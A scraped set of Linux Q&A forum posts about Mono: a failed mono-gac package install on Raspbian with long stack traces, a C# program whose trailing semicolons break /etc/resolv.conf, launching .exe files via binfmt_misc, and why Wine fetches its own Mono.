at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/share/cli-common/policies.d/libnunit-console-runner2.6.3-cil/policy.2.6.nunit-console-runner.dll failed
E: Installation of policy.2.6.nunit-console-runner with /usr/share/cli-common/runtimes.d/mono failed
* Installing 1 assembly from policy.2.6.nunit.core into MonoUnhandled Exception:
System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/share/cli-common/policies.d/libnunit-core2.6.3-cil/policy.2.6.nunit.core.dll failed
E: Installation of policy.2.6.nunit.core with /usr/share/cli-common/runtimes.d/mono failed
* Installing 1 assembly from policy.2.6.nunit.core.interfaces into MonoUnhandled Exception:
System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/share/cli-common/policies.d/libnunit-core-interfaces2.6.3-cil/policy.2.6.nunit.core.interfaces.dll failed
E: Installation of policy.2.6.nunit.core.interfaces with /usr/share/cli-common/runtimes.d/mono failed
* Installing 1 assembly from policy.2.6.nunit.framework into MonoUnhandled Exception:
System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/share/cli-common/policies.d/libnunit-framework2.6.3-cil/policy.2.6.nunit.framework.dll failed
E: Installation of policy.2.6.nunit.framework with /usr/share/cli-common/runtimes.d/mono failed
* Installing 1 assembly from policy.2.6.nunit.mocks into MonoUnhandled Exception:
System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/share/cli-common/policies.d/libnunit-mocks2.6.3-cil/policy.2.6.nunit.mocks.dll failed
E: Installation of policy.2.6.nunit.mocks with /usr/share/cli-common/runtimes.d/mono failed
* Installing 1 assembly from policy.2.6.nunit.util into MonoUnhandled Exception:
System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/share/cli-common/policies.d/libnunit-util2.6.3-cil/policy.2.6.nunit.util.dll failed
E: Installation of policy.2.6.nunit.util with /usr/share/cli-common/runtimes.d/mono failed
dpkg: error processing package mono-gac (--configure):
subprocess installed post-installation script returned error exit status 29
dpkg: dependency problems prevent configuration of mono-runtime-common:
mono-runtime-common depends on mono-gac (= 6.0.0.319-0xamarin1+raspbian9b1); however:
Package mono-gac is not configured yet.dpkg: error processing package mono-runtime-common (--configure):
dependency problems - leaving unconfigured
Errors were encountered while processing:
mono-gac
mono-runtime-common
E: Sub-process /usr/bin/dpkg returned an error code (1)It's also recommanded to do an apt --fix-broken install when I do a apt autoremove.
Reading package lists... Done
Building dependency tree
Reading state information... Done
You might want to run 'apt --fix-broken install' to correct these.
The following packages have unmet dependencies:
mono-devel : Depends: ca-certificates-mono (= 6.0.0.319-0xamarin1+raspbian9b1) but 5.12.0.226-0xamarin3+raspbian9b1 is installed
E: Unmet dependencies. Try 'apt --fix-broken install' with no packages (or specify a solution).Does anyone have a suggestion on how to fix this ?
Thank you very much
| apt --fix-broken install fails |
It looks to me like your code is adding a semicolon to the end of the nameserver line; don't do that.
| This is an odd one but I seem to be unable to solve it.
I'm creating a visual user interface to modify internet settings on Debian Wheezy (and other debian versions/derivatives that are incidentally compatible).
I want to be able to modify the DNS on the basis of what the user inserts.
After "Save" is pressed this code is ran:
void SaveDNSButton_event(object obj, ButtonPressEventArgs args)
{
//save dns settings
string s1 = "";
string s2 = ""; string toWrite = s1 + s2;
Console.WriteLine ("=============");
Console.WriteLine ("Reading from resolv.conf before writing...");
using (StreamReader confReader = File.OpenText ("/etc/resolv.conf")) {
StringReader sr = new StringReader (confReader.ReadToEnd ());
string line;
toWrite = "";
while (null != (line = sr.ReadLine ())) {
if (line.Contains ("nameserver")) {
Console.WriteLine (line);
} else {
toWrite += line + Environment.NewLine;
}
}
confReader.Dispose ();
confReader.Close ();
} s1 = "nameserver " + DNSentry1.Text + ";" + Environment.NewLine;
s2 = "nameserver " + DNSentry2.Text + ";" + Environment.NewLine; Console.WriteLine ("=============");
Console.WriteLine ("Writing to resolv.conf");
Console.WriteLine ("To write: " + toWrite + s1 + s2); using (StreamWriter confWriter = new StreamWriter ("/etc/resolv.conf", false)) {
Console.WriteLine ("Writing...");
confWriter.Write (toWrite + s1 + s2);
Console.WriteLine ("Closing file stream...");
confWriter.Dispose ();
confWriter.Close ();
} Console.WriteLine ("============="); Console.WriteLine ("Opening conf to confirm if it worked");
if (IsLinux) {
Console.WriteLine ("Trying to open conf");
StreamReader file = File.OpenText ("/etc/resolv.conf");
string s = file.ReadToEnd ();
Console.WriteLine(s); file.Dispose ();
file.Close ();
}
}The relevant part is
using (StreamWriter confWriter = new StreamWriter ("/etc/resolv.conf", false)) {
Console.WriteLine ("Writing...");
confWriter.Write (toWrite + s1 + s2);
Console.WriteLine ("Closing file stream...");
confWriter.Dispose ();
confWriter.Close ();
}Wherein I overwrite resolv.conf with the filled in DNS info. An example input to this would be something like "8.8.8.8" in the first dialog and "8.8.4.4" in the second. The output would be...
=============
Reading from resolv.conf before writing...
nameserver 192.168.2.101
nameserver 8.8.8.8
=============
Writing to resolv.conf
To write: # Generated by NetworkManager
domain trin-it.local
search trin-it.local
nameserver 8.8.8.8;
nameserver 8.8.4.4;Writing...
Closing file stream...
=============
Opening conf to confirm if it worked
4
Trying to open conf
# Generated by NetworkManager
domain trin-it.local
search trin-it.local
nameserver 8.8.8.8;
nameserver 8.8.4.4;If I ping google after this it just says: "unknown host google"
HOWEVER, if I manually go to resolv.conf and change the nameservers there it actually resolves just fine. What is up with that? The only change is that I do it through code instead of just nano /etc/resolv.conf, as far as I can tell. Can anyone shed some light on this?
TL;DR
Why would editing resolv.conf with code NOT work as opposed to manually editing it? Wouldn't it be the same thing?
| Resolv.conf modification breaks DNS [closed] |
Ubuntu has this by default, AFAIK. For an idea of how this might work, take a look at: binfmt_misc
|
I always wondered if running Mono apps will ever be available for Linux by just double clicking on the .exe. Now, in order to have a launcher on GNOME, the best way is to add a new bash file which will do the 'mono myapp.exe' for you.
I remember there were some ideas to have that in Linux long time ago, but nothing recently...
| Enable running mono apps by double-clicking on the .exe file |
It seems I've found the answer myself: Wine uses a version of Mono built for the Windows platform while the instance of Mono installed in the system is, obviously, built for Linux.
|
I have installed the latest available Mono from the Mono project repositories (I have also tried installing it from the default system repos) but as soon as I run Wine it asks me about downloading Mono and downloads it if I agree. Why does it need it? Why won't it just use the system Mono instance?
Same things is applicable to the Gecko engine - it asks to download it too instead of just using what comes with Firefox.
| Why does Wine need to install its own instance of Mono when there already is a fresh version of Mono installed in the system? |